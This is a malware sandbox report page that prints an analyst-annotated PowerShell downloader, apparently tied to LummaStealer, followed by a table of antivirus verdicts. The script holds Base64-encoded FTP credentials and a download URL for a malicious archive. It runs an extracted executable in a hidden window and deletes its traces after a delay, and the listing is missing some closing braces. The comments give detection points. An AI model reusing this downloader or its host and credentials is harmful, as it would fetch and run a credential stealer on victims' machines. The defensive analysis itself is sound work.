Static | ZeroBOX
No static analysis available.
# Analyst summary: PowerShell downloader captured by the sandbox. It fetches a ZIP
# over authenticated FTP, unpacks it under %TEMP%, launches one executable from the
# archive with a hidden window, then waits and deletes the staged files.
# Several vendor labels in this report's signature table name LummaStealer / LummaC2.
# NOTE(review): the closing braces of the two `if` blocks and the `else` are missing
# from this listing (likely lost in extraction), so the nesting described below is
# inferred from statement order. Confirm against the raw sample.
# Detection points: PowerShell script block logging (Event ID 4104) records these
# statements; also watch for FTP connections made by powershell.exe and for process
# creation from a directory under %TEMP%.

# WebClient object used for the download.
$u = New-Object System.Net.WebClient
# FTP username and password are stored as Base64 literals and decoded only at run
# time, so the plaintext never appears in the script text. Treat both as IoCs.
$u.Credentials = New-Object System.Net.NetworkCredential([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("QXN0cm9WaXNpb24=")), [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("VmUhMG1oMTY=")))
# Staging directory and archive path under the user's %TEMP%. Backslash is not an
# escape character in PowerShell, so "\\" is two literal backslashes; file-system
# telemetry may show the path with one or two separators. Match both when hunting.
$g = "$env:TEMP\\ezip"
$r = "$env:TEMP\\a1ao.zip"
# File name expected inside the archive. It matches the name of a Windows component,
# so a copy running from a %TEMP% subfolder rather than a system directory is the
# anomaly to alert on.
$o = "rdpinit.exe"
# Download URL, Base64-encoded to hide it from string matching. It decodes to
# ftp://shaileshvisionaryastrologer[.]com/Scripts/Junction.zip (defanged here).
$n = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("ZnRwOi8vc2hhaWxlc2h2aXNpb25hcnlhc3Ryb2xvZ2VyLmNvbS9TY3JpcHRzL0p1bmN0aW9uLnppcA=="))
# The download runs unconditionally, before the directory check below. FTP is
# cleartext, so the login and the archive are visible to network monitoring.
$u.DownloadFile($n, $r)
# Extraction and launch are gated on the staging directory not existing yet.
# Presumably a crude run-once guard; verify once the brace structure is known.
if (-Not (Test-Path -Path $g)) {
New-Item -ItemType Directory -Path $g | Out-Null
# Load the .NET ZIP support and unpack the whole archive into the staging directory.
Add-Type -AssemblyName System.IO.Compression.FileSystem
[System.IO.Compression.ZipFile]::ExtractToDirectory($r, $g)
$p = Join-Path -Path $g -ChildPath $o
if (Test-Path -Path $p) {
# Launch the extracted executable with no visible window; no -Wait is given, so the
# script does not block on the child process.
Start-Process -FilePath $p -WindowStyle Hidden
} else {
# The Base64 literal decodes to "Executable not found in extracted folder."
Write-Error ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("RXhlY3V0YWJsZSBub3QgZm91bmQgaW4gZXh0cmFjdGVkIGZvbGRlci4=")))
# Wait 700 seconds (about 11.7 minutes), then delete the archive and the staging
# directory, removing the on-disk artifacts. Triage that relies on these files must
# collect them inside that window or use sandbox/EDR file capture.
# NOTE(review): which branch this cleanup belongs to cannot be determined here
# because the braces are missing.
Start-Sleep -Seconds 700
Remove-Item -Path $r -Force
Remove-Item -Path $g -Recurse -Force
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.PowerShell.4!c
ClamAV Clean
CTX powershell.trojan.lummastealer
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Trojan.Agent.GNVQ
Malwarebytes Clean
Zillya Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
huorong Trojan/Generic!B10ECCEC160C1D8B
Baidu Clean
VirIT Clean
Symantec Trojan.Gen.MBT
ESET-NOD32 PowerShell/TrojanDownloader.Agent.KTB
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky Clean
BitDefender Trojan.Agent.GNVQ
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.Agent.GNVQ
Tencent Win32.Trojan-Downloader.Downloader.Fwnw
Sophos Clean
F-Secure Clean
DrWeb PowerShell.DownLoader.2269
VIPRE Trojan.Agent.GNVQ
TrendMicro Clean
CMC Clean
Emsisoft Trojan.Agent.GNVQ (B)
Ikarus Trojan-Downloader.PowerShell.Agent
FireEye Trojan.Agent.GNVQ
Jiangmin Clean
Varist ABTrojan.VQQZ-
Avira Clean
Fortinet Clean
Antiy-AVL Clean
Kingsoft Win32.Troj.Undef.a
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Agent.GNVQ
SUPERAntiSpyware Clean
Microsoft Trojan:PowerShell/LummaStealer.DRS!MTB
Google Detected
AhnLab-V3 Downloader/Powershell.LummaC2.SC227430
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
SentinelOne Clean
MaxSecure Clean
GData Trojan.Agent.GNVQ
AVG Script:SNH-gen [Trj]
Panda Clean
alibabacloud Clean
No IRMA results available.